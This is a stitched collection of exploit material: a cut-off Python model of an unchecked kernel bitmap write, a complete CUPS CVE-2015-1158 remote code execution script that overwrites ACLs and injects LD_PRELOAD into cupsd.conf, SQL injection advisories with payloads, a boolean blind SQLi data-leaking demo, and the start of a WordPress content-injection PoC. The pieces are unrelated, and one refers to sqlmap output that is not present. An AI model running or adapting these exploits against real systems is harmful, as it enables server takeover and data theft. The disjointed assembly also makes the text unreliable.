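COVERED_BYTES = BITMAP_BYTES * 8 * 0x1000        # 0x1_0000_0000 bytes of PA space
KERNEL_VA_BASE = 0xFFFFFFC000000000              # assumed, illustrative only
MASK64 = (1 << 64) - 1


def rkp_get_pa(kernel_va):
    """Constant-offset VA->PA, the conversion the write-up says is done without bounds checks."""
    return (kernel_va - KERNEL_VA_BASE + BITMAP_BASE_PA) & MASK64


def bitmap_target(phys_addr):
    """Same arithmetic as the decompiled function: (qword index, bit, index is in bounds).

    The subtraction is unsigned 64-bit, so a PA below the base wraps around
    exactly as in the C code; nothing here rejects an out-of-range address.
    """
    phys_off = (phys_addr - BITMAP_BASE_PA) & MASK64
    qword_index = (phys_off >> 18) & 0x3FFFFFFFFFFF
    bit_offset = (phys_off >> 12) & 0x3F
    return qword_index, bit_offset, qword_index < BITMAP_QWORDS


def byte_offset_from_bitmap(phys_addr):
    """Byte offset from the bitmap base that the unchecked write lands on."""
    return bitmap_target(phys_addr)[0] * 8


def pa_for_target(qword_index, bit_offset):
    """Inverse of bitmap_target: the PA to pass in to hit a chosen qword and bit."""
    return BITMAP_BASE_PA + (qword_index << 18) + (bit_offset << 12)


def rkp_set_pgt_bitmap_checked(bitmap, phys_addr, set_bit):
    """Hardened variant: reject anything outside the range the bitmap covers before touching memory."""
    if phys_addr < BITMAP_BASE_PA or phys_addr - BITMAP_BASE_PA >= COVERED_BYTES:
        return False
    qword_index, bit_offset, _ = bitmap_target(phys_addr)
    byte_i = qword_index * 8 + bit_offset // 8       # little-endian qword layout
    mask = 1 << (bit_offset % 8)
    if set_bit:
        bitmap[byte_i] |= mask
    else:
        bitmap[byte_i] &= 0xFF ^ mask
    return True


if __name__ == "__main__":
    end_pa = BITMAP_BASE_PA + COVERED_BYTES          # first PA past the covered range
    print("PA %#x -> qword %#x, bit %d, in bounds: %s" % ((end_pa,) + bitmap_target(end_pa)))
    # Choose an address so the write lands 0x100 bytes past the bitmap's end.
    target_pa = pa_for_target(BITMAP_QWORDS + 0x100 // 8, 0)
    print("to hit bitmap+%#x pass PA %#x (VA %#x under the assumed linear map)" % (
        byte_offset_from_bitmap(target_pa), target_pa, target_pa - BITMAP_BASE_PA + KERNEL_VA_BASE))
```

The first physical address past the covered 4GB range already yields qword index 0x4000, one past the last entry; any address below the base wraps to a huge index. The checked variant rejects both cases before the write, which is the check the decompiled code is missing.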
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *
def banner():
print '''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target IPP service port\n"
" -c, --lib /path/to/payload.so\n"
" -f, --stomp-only Only stomp the ACL (no postex)\n"
"\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 631 -f\n"
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
exit()
def pretty (t, m):
    # compare by value; "is" on string literals only worked by interning accident
    if t == "+":
        print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
    elif t == "-":
        print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
    elif t == "*":
        print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
    elif t == "!":
        print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
    # hex dump helper: 16 bytes per row, hex on the left, printable ASCII on the right
    d, b, h = '', [], []
    u = list(input)
    for e in u:
        h.append(e.encode("hex"))
        # printable ASCII goes through as-is; NUL, control bytes and high bytes become a dot
        if 32 <= ord(e) < 127:
            b.append(e)
        else:
            b.append('.')
    i = 0
    while i < len(h):
        if (len(h) - i ) >= 16:
            d += ' '.join(h[i:i+16])
            d += " "
            d += ' '.join(b[i:i+16])
            d += "\n"
            i = i + 16
        else:
            d += ' '.join(h[i:(len(h) - 0 )])
            pad = len(' '.join(h[i:(len(h) - 0 )]))
            d += ' ' * (56 - pad)
            d += ' '.join(b[i:(len(h) - 0 )])
            d += "\n"
            i = i + len(h)
    return d
class tcpsock:
def __init__(self, sock=None):
if sock is None:
self.sock = socket(
AF_INET, SOCK_STREAM)
self.sock.settimeout(30)
else:
self.sock = sock
def connect(self, host, port):
self.sock.connect((host, int(port)))
def tx(self, msg):
self.sock.send(msg)
def rx(self):
tmp = self.sock.recv(1024)
msg = ""
while tmp:
msg += tmp
tmp = self.sock.recv(1024)
return msg
def txrx (ip, port, proto, txpacket):
    # only TCP is used by this exploit; the script defines no udpsock class
    if proto != "tcp":
        return None
    sock = tcpsock()
    sock.connect(ip, port)
    sock.tx(txpacket)
    rxpacket = sock.rx()
    return rxpacket
def locatePrinters(rhost, rport="631"):
request = ( "GET /printers HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
response = txrx(rhost, int(rport), "tcp", request)
if response is not None:
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
if m is not None:
printer = m.group(1)
pretty("+","printer found: " + printer)
return printer
else:
pretty("-","no printers")
exit(1)
else:
pretty("-","no printers")
exit(1)
def preparePayload(libpath):
with open(libpath, 'rb') as f:
payload = f.read()
if payload is not None:
pretty("*","Payload:\n" + createDump(payload))
else:
pretty("-","something went wrong")
usage()
return payload
def seedTarget(rhost, rport, printer, payload):
i = random.randint(1,3)
reqid = str(pack(">i",(i+2)))
reqid2 = str(pack(">i",(i+3)))
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer
create_job_packet = ("\x02\x00"
"\x00\x05"+
reqid+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
"\x02"
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
"\x03")
pretty("*","Sending createJob")
http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
createJobRequest = http_header1 + create_job_packet
blah = txrx(rhost,int(rport),"tcp",createJobRequest)
if blah is not None:
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
if m is not None:
jobid = m.group(1)
else:
pretty("-","something went wrong");
exit()
pretty("*","\n" + createDump(blah) + "\n")
pretty("*", "Sending sendJob")
send_document_packet = ("\x02\x00"
"\x00\x06"+
reqid2+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
"\x03"+
payload)
http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
sendJobRequest = http_header2 + send_document_packet
blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
    pretty("*","\n" + createDump(blah2) + "\n")
pretty("*","job id: " + jobid)
return jobid
def stompACL(rhost, rport, printer):
i = random.randint(1,1024)
printer_url = "ipp://" + rhost + ":" + rport + printer
admin_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+1)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x06" # val len: 6
"/admin"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x06" # val len: 6
"/admin"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x16" # val len: 22
"\x00\x06" # length
"/admin"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
conf_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+2)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x1b" # val len: 27
"\x00\x0b" # length
"/admin/conf"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
"\x0d\x0a")
http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","stomping ACL")
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
time.sleep(1)
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))
http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","checking /admin")
pretty("*",">:\n" + createDump(http_header_check))
res = txrx(rhost,rport,"tcp",http_header_check)
pretty("*","<:\n" + createDump(res))
m = re.search('200 OK', res)
if m is not None:
pretty("+","ACL stomp successful")
else:
pretty("-","exploit failed")
exit(1)
def getConfig(rhost, rport):
i = random.randint(1,1024)
original_config = ""
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","grabbing configuration file....")
res = txrx(rhost,rport,"tcp",http_request)
res_array = res.split("\x0d\x0a\x0d\x0a")
original_config = res_array[1]
pretty("*","config:\n" + original_config + "\n")
return original_config
def putConfig(rhost, rport, config):
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"Content-Length: " + str(len(config)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","overwriting config...")
pretty("*",">:\n" + createDump(http_request + config))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
def poisonConfig(config, name):
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
return config
def main():
    rhost = None
    rport = None
    noshell = None
    libpath = None
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a','--rhost'):
            rhost = arg
        elif opt in ('-b','--rport'):
            rport = arg
        elif opt in ('-c','--lib'):
            libpath = arg
        elif opt in ('-f','--stomp-only'):
            noshell = 1
    banner()
    if rhost is None or rport is None:
        usage()
    # post-exploitation needs a library to preload; bail out before touching the target
    if noshell is None and libpath is None:
        usage()
pretty("*","locate available printer")
printer = locatePrinters(rhost, rport)
pretty("*","stomp ACL")
stompACL(rhost, rport, printer)
if (noshell is not None):
pretty("*","fin")
exit(0)
pretty("*","prepare payload")
payload = preparePayload(libpath)
pretty("*","spray payload")
jobid = seedTarget(rhost, rport, printer, payload)
pretty("*","grab original config")
OG_config = getConfig(rhost, rport)
pretty("*","generate poison config")
evil_config = poisonConfig(OG_config, jobid)
pretty("*","upload poison config")
putConfig(rhost, rport, evil_config)
pretty("*","fin")
exit(0);
if __name__ == "__main__":
main()
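The exploit above writes every IPP request out as hex literals, counting name and value lengths by hand (version 2.0, operation-id, request-id, the 0x01 operation-attributes and 0x02 job-attributes delimiters, then value-tag / name-length / name / value-length / value records, ending with 0x03). The Python 3 script below is an added example, not part of the exploit or of CUPS: a minimal encoder and decoder for that RFC 8010 framing, used to rebuild the same Create-Job request from fields and to parse a response for job-id instead of regexing job-uri. The printer URI and job id are constructed values.

```python
import struct

# Added example, not part of the exploit above: a small encoder/decoder for
# the IPP (RFC 8010) framing the script writes out as hex literals, so the
# byte layout (version, operation-id, request-id, delimiter tags, value tags,
# name-length/name/value-length/value, end tag 0x03) can be built and parsed
# instead of counted by hand. The printer URI and job id used below are
# constructed values, not taken from any real target.

IPP_VERSION = b"\x02\x00"
OP_CREATE_JOB, OP_SEND_DOCUMENT = 0x0005, 0x0006
TAG_OPERATION_ATTRS, TAG_JOB_ATTRS, TAG_END = 0x01, 0x02, 0x03
TAG_INTEGER, TAG_BOOLEAN = 0x21, 0x22
TAG_NAME_WO_LANG, TAG_KEYWORD, TAG_URI = 0x42, 0x44, 0x45
TAG_CHARSET, TAG_NATURAL_LANGUAGE, TAG_MIME_TYPE = 0x47, 0x48, 0x49


def encode_attr(tag, name, value):
    """attribute-with-one-value: value-tag, name-length, name, value-length, value (all big-endian)."""
    if tag == TAG_INTEGER:
        raw = struct.pack(">i", value)
    elif tag == TAG_BOOLEAN:
        raw = b"\x01" if value else b"\x00"
    else:
        raw = value.encode() if isinstance(value, str) else value
    name_b = name.encode()
    return struct.pack(">BH", tag, len(name_b)) + name_b + struct.pack(">H", len(raw)) + raw


def encode_request(op_id, request_id, op_attrs, job_attrs=(), data=b""):
    """version, operation-id (status-code in a response), request-id, groups, 0x03, document data."""
    out = IPP_VERSION + struct.pack(">Hi", op_id, request_id) + bytes([TAG_OPERATION_ATTRS])
    out += b"".join(encode_attr(t, n, v) for t, n, v in op_attrs)
    if job_attrs:
        out += bytes([TAG_JOB_ATTRS]) + b"".join(encode_attr(t, n, v) for t, n, v in job_attrs)
    return out + bytes([TAG_END]) + data


def decode_message(buf):
    """Returns (version, op_or_status, request_id, groups, trailing data).

    groups is [(delimiter_tag, [(value_tag, name, value), ...]), ...]. A value with
    name-length 0 is an additional value of the preceding attribute (a 1setOf), as
    the exploit's two-value job-sheets attribute shows, and is recorded under that name.
    """
    code, req_id = struct.unpack(">Hi", buf[2:8])
    pos, groups, current = 8, [], None
    while pos < len(buf):
        tag = buf[pos]
        pos += 1
        if tag == TAG_END:
            break
        if tag < 0x10:                                   # delimiter tag: new attribute group
            current = (tag, [])
            groups.append(current)
            continue
        name_len = struct.unpack(">H", buf[pos:pos + 2])[0]
        name = buf[pos + 2:pos + 2 + name_len].decode()
        pos += 2 + name_len
        val_len = struct.unpack(">H", buf[pos:pos + 2])[0]
        raw = buf[pos + 2:pos + 2 + val_len]
        pos += 2 + val_len
        if tag == TAG_INTEGER:
            value = struct.unpack(">i", raw)[0]
        elif tag == TAG_BOOLEAN:
            value = raw == b"\x01"
        else:
            value = raw.decode("utf-8", "replace")
        if name_len == 0 and current[1]:
            name = current[1][-1][1]
        current[1].append((tag, name, value))
    return buf[0:2], code, req_id, groups, buf[pos:]


def create_job_request(printer_uri, request_id):
    """The Create-Job the exploit sends, expressed as fields rather than hex."""
    op_attrs = [
        (TAG_CHARSET, "attributes-charset", "utf-8"),
        (TAG_NATURAL_LANGUAGE, "attributes-natural-language", "en-us"),
        (TAG_URI, "printer-uri", printer_uri),
        (TAG_NAME_WO_LANG, "requesting-user-name", "root"),
        (TAG_NAME_WO_LANG, "job-name", "badlib"),
    ]
    job_attrs = [
        (TAG_INTEGER, "copies", 1),
        (TAG_KEYWORD, "job-hold-until", "indefinite"),
        (TAG_INTEGER, "job-priority", 50),
    ]
    return encode_request(OP_CREATE_JOB, request_id, op_attrs, job_attrs)


def job_id_from_response(buf):
    """Read job-id from a Create-Job response; the exploit regexes job-uri for the same number."""
    for _, attrs in decode_message(buf)[3]:
        for tag, name, value in attrs:
            if name == "job-id" and tag == TAG_INTEGER:
                return value
    return None
```

Feeding the output of create_job_request back through decode_message round-trips every field, and the decoder's handling of a zero-length name is what makes the exploit's `job-sheets` record with two `none` values parse as one attribute with two values rather than a nameless second attribute.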
# # # # #
# Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/travel-portal-script/
# Demo: http://travel.itechscripts.com/
# Version: 9.35
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/content.php?id=[SQL]
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/showCity.php?q=[SQL]
# etc.
# # # # #
# # # # #
# Exploit Title: Itech Movie Portal Script v7.37 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/movie-portal-script/
# Demo: http://movie-portal.itechscripts.com
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/cms.php?id=[SQL]
# http://localhost/[PATH]/show_news.php?id=[SQL]
# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
# etc.
# # # # #
# # # # #
# Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/auction-script/
# Demo: http://auction.itechscripts.com/
# Version: 6.49
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL]
# etc.
# # # # #
# # # # #
# Exploit Title: Itech News Portal Script v6.28 - 'sc' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/news-portal-script/
# Demo: http://news-portal.itechscripts.com/
# Version: 6.28
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/subcategory.php?sc=[SQL]
# etc.
# # # # #
# # # # #
# Exploit Title: Itech Inventory Management Software v3.77 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/inventory-management-software/
# Demo: http://inventory.itechscripts.com/
# Version: 3.77
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as employee user
# http://localhost/[PATH]/notice-edit.php?aid=[SQL]
# etc.
# # # # #
Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Advanced PHP real-estate script covering the main features required for a property buy-and-sell listing site.
Vulnerable Url: http://localhost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind
Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop
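The boolean-based payload in the SlimarUSER sqlmap output (`7' AND 6275=6275 AND 'DFYF'='DFYF`) and the time-based one above (`443' AND SLEEP(5) AND 'FBop'='FBop`) both rely on the id being spliced into the SQL text inside single quotes. The Python 3 script below is an added example, not taken from any of these advisories or from the vendors' code: it uses a constructed SQLite table in place of the vendor schemas, reproduces the boolean-based oracle against that query pattern, recovers another row's data through it, and shows the parameterized query that closes the hole. SQLite has no SLEEP(), so the time-based variant is not reproduced.

```python
import sqlite3

# Added example, not taken from any of the advisories above: a constructed
# SQLite table standing in for the vendor's inbox/property tables, the query
# pattern behind `inbox.php?p=view&id=...`, and the boolean-based blind oracle
# that sqlmap's `7' AND 6275=6275 AND 'DFYF'='DFYF` payload implies. Table,
# column and row contents are invented. SQLite has no SLEEP(), so only the
# boolean technique is shown; the parameterized variant is the fix.

SCHEMA = """
CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT);
INSERT INTO messages VALUES (7, 'alice', 'hello');
INSERT INTO messages VALUES (8, 'bob', 'not yours');
"""


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def injected_sql(msg_id):
    """The query text the vulnerable page builds: the id lands inside the quotes unescaped."""
    return "SELECT body FROM messages WHERE id='%s'" % msg_id


def view_vulnerable(db, msg_id):
    return [row[0] for row in db.execute(injected_sql(msg_id))]


def view_parameterized(db, msg_id):
    """Same query with a bound parameter: the payload is compared as a value, never parsed as SQL."""
    return [row[0] for row in db.execute("SELECT body FROM messages WHERE id=?", (msg_id,))]


def blind_oracle(db, condition, base_id="7"):
    """True/false for an arbitrary SQL condition, in the shape of sqlmap's boolean payload."""
    payload = "%s' AND (%s) AND 'DFYF'='DFYF" % (base_id, condition)
    return len(view_vulnerable(db, payload)) > 0


def leak_owner_length(db, target_id, limit=64):
    for n in range(limit + 1):
        if blind_oracle(db, "(SELECT length(owner) FROM messages WHERE id=%d)=%d" % (target_id, n)):
            return n
    raise RuntimeError("no answer within limit")


def leak_owner(db, target_id, alphabet="abcdefghijklmnopqrstuvwxyz"):
    """Recover another row's owner one character at a time through the oracle."""
    out = ""
    for pos in range(1, leak_owner_length(db, target_id) + 1):
        for ch in alphabet:
            cond = "(SELECT substr(owner,%d,1) FROM messages WHERE id=%d)='%s'" % (pos, target_id, ch)
            if blind_oracle(db, cond):
                out += ch
                break
    return out


if __name__ == "__main__":
    db = fresh_db()
    print(injected_sql("7' AND 6275=6275 AND 'DFYF'='DFYF"))
    print(view_vulnerable(db, "7' AND 6275=6275 AND 'DFYF'='DFYF"),
          view_vulnerable(db, "7' AND 6275=6276 AND 'DFYF'='DFYF"))
    print(view_parameterized(db, "7' AND 6275=6275 AND 'DFYF'='DFYF"))
    print("owner of message 8:", leak_owner(db, 8))
```

The true and false forms of the payload return the row and an empty result respectively, which is the whole signal a boolean-based blind attack needs; the bound-parameter version returns nothing for the payload because the entire string is compared against the id column as data.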
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
